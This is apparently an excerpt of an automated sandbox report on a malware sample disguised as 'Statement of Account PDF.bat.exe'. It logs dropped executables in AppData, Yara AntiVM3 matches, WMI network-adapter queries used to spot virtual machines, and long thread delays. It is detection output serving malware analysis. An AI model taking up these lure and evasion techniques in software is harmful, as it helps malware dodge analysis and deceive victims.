                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: Statement of Account PDF.bat.exe PID: 6984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: gDdsxauPhk.exe PID: 7440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 8032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7400, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: EF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 2940000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 26D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 8F50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 78F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 9F50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: AF50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: B480000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 8F50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 1010000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 2F60000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 7F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 2540000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 2260000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 8160000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 9160000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 9350000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: A350000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: A940000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 8160000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 1400000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 3030000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 2E60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: FE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2BD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1270000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 89F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 99F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 9BE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: ABE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: B140000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: C140000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: D140000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1640000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 34F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1940000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: E80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2A40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 27A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 8710000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 9710000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 9900000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: A900000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: AF80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: BF80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: CF80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2610000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2900000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 4900000 memory reserve | memory write watch
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1200000Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199874Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199765Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199656Jump to behavior
